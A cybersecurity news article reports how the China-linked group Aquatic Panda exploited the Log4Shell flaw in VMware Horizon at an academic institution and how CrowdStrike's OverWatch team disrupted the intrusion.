30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw


China-based cyber spies breached an academic institution through Log4j flaw

China-linked cyber-espionage group known as Aquatic Panda has been recently spotted exploiting the Log4Shell vulnerability to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) in order to gain access to the instance of VMware Horizon that employed the vulnerable Log4j library at an unnamed academic institution.

The purpose of the attack is unknown because the intrusion was thwarted.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor performed connectivity checks via DNS lookups for a subdomain executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on a Windows host under the Apache Tomcat service to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used winRAR to compress the memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.


Back to the list

Latest Posts

Pro-Russian hackers spread disinformation to demoralize Ukraine, divide from allies

Pro-Russian hackers spread disinformation to demoralize Ukraine, divide from allies

Some of the falsehoods targeted Russian domestic audiences, underscoring Russia’s need to sell the war to its own people.
20 May 2022
Twitter steps up efforts to battle misinformation, including misleading posts about war in Ukraine

Twitter steps up efforts to battle misinformation, including misleading posts about war in Ukraine

Twitter will no longer recommend and amplify posts related to the Russian invasion of Ukraine that have been identified as false.
20 May 2022
US won’t prosecute “white hat” hackers under CFAA

US won’t prosecute “white hat” hackers under CFAA

The updated policy now states that the “hacking law” shouldn't be used to target white-hat hackers acting in good faith.
20 May 2022